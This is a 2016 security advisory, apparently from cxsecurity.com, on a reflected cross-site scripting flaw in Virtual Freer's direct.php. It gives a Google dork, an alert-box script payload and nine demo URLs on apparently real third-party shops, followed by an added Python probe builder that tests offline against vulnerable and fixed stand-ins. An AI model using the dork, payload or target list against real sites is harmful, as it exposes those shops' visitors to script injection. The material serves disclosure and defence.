Virtual Freer Cross Site Scripting

2016.01.27
Credit: R4SOUL
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

############In The Name Of God############
# Exploit Title : Virtual Freer Cross Site Scripting
# Exploit Author : R4SOUL
# Vendor Homepage : http://freer.ir/
# Google Dork : site:.ir inurl:direct.php?card=
# Date : 26 January 2016
# Tested On : Win 10 / Mozilla Firefox
###########################################
# Exploit:
# Reflected XSS in direct.php. Search the dork, choose a target and append
#     '"<script>alert('R4SOUL')</script>
# to the value of the qty parameter in the URL (see the demos below). The
# payload is reflected into the response without HTML encoding, so the
# script runs in the browser of anyone who opens the crafted link.
###########################################
#
# Demos (the last one is the same payload, URL-encoded by the browser):
# http://inet2.ir/direct.php?card=9&qty=1'"<script>alert('R4SOUL')</script>
# http://www.milanvpn50.tk/boy/direct.php?qty=1'"<script>alert('R4SOUL')</script>&card=16
# http://www.nextvpn.in/pay/direct.php?card=2&qty=1'"<script>alert('R4SOUL')</script>
# http://pay.freer.ir/direct.php?card=5&qty=1'"<script>alert('R4SOUL')</script>
# http://www.sabzandishan.ir/shop/direct.php?card=64&qty=1'"<script>alert('R4SOUL')</script>
# http://shop.mihannod.ir/direct.php?card=15&qty=1'"<script>alert('R4SOUL')</script>
# http://store.parseset.ir/direct.php?card=3&qty=1'"<script>alert('R4SOUL')</script>
# http://www.keriomaker020.in/buy/direct.php?card=1&qty=1'"<script>alert('R4SOUL')</script>
# http://tx166.ir/shop/direct.php?card=25&qty=1%27%22%3Cscript%3Ealert(%27R4SOUL%27)%3C/script%3E
###########################################
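As an added example (not part of the advisory and not Virtual Freer's own code), the following Python script builds the probe URL the way the advisory describes and runs it offline against two constructed stand-ins for direct.php: one that echoes qty straight into an HTML attribute, which is the assumed behaviour behind the advisory's PoC, and one hardened with HTML entity encoding, the equivalent of PHP's htmlspecialchars($v, ENT_QUOTES). The host example.invalid and the two simulate_* functions are assumptions; nothing is fetched over the network.

```python
"""Probe builder and offline reflection check for the direct.php XSS.

Added example, not code from the advisory or from Virtual Freer. The two
simulate_* functions are assumed stand-ins for direct.php and example.invalid
is a placeholder host; no network request is made.
"""
import html
from urllib.parse import parse_qsl, urlencode, urlparse, urlunparse

# The advisory's probe: closes a single- or double-quoted attribute value,
# then injects a script element.
PAYLOAD = "'\"<script>alert('R4SOUL')</script>"


def build_test_url(url: str, param: str, payload: str = PAYLOAD) -> str:
    """Append the payload to the value of `param` (added if absent), URL-encoded.

    Works whatever the order of the query parameters, which matters for the
    demo URL that puts qty before card.
    """
    parts = urlparse(url)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    query[param] = query.get(param, "") + payload
    return urlunparse(parts._replace(query=urlencode(query)))


def simulate_vulnerable_page(params: dict) -> str:
    """Assumed vulnerable direct.php: card and qty echoed raw into attributes."""
    card = params.get("card", "")
    qty = params.get("qty", "1")
    return (f'<form action="direct.php"><input name="card" value="{card}">'
            f'<input name="qty" value="{qty}"></form>')


def simulate_fixed_page(params: dict) -> str:
    """Hardened version: every reflected value is entity-encoded, quotes included
    (what htmlspecialchars($v, ENT_QUOTES) does in PHP)."""
    card = html.escape(params.get("card", ""), quote=True)
    qty = html.escape(params.get("qty", "1"), quote=True)
    return (f'<form action="direct.php"><input name="card" value="{card}">'
            f'<input name="qty" value="{qty}"></form>')


def reflects_unescaped(body: str, payload: str = PAYLOAD) -> bool:
    """True if the payload appears in the response byte-for-byte, i.e. unencoded."""
    return payload in body


def check(page, url: str, param: str = "qty") -> bool:
    """Build the probe URL, hand its decoded query to `page` (a stand-in for the
    HTTP request) and report whether the payload comes back unencoded."""
    probe = build_test_url(url, param)
    params = dict(parse_qsl(urlparse(probe).query, keep_blank_values=True))
    return reflects_unescaped(page(params))


if __name__ == "__main__":
    target = "http://example.invalid/direct.php?card=5&qty=1"
    print(build_test_url(target, "qty"))
    print("vulnerable stand-in reflects payload:", check(simulate_vulnerable_page, target))
    print("fixed stand-in reflects payload:     ", check(simulate_fixed_page, target))
```

Against a live target, replace the stand-in with a GET of the probe URL and run reflects_unescaped over the response body; an unencoded match is the condition the advisory's alert box demonstrates. A match inside an HTML comment or an existing script block would also be flagged, so confirm execution in a browser before reporting.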


Copyright 2024, cxsecurity.com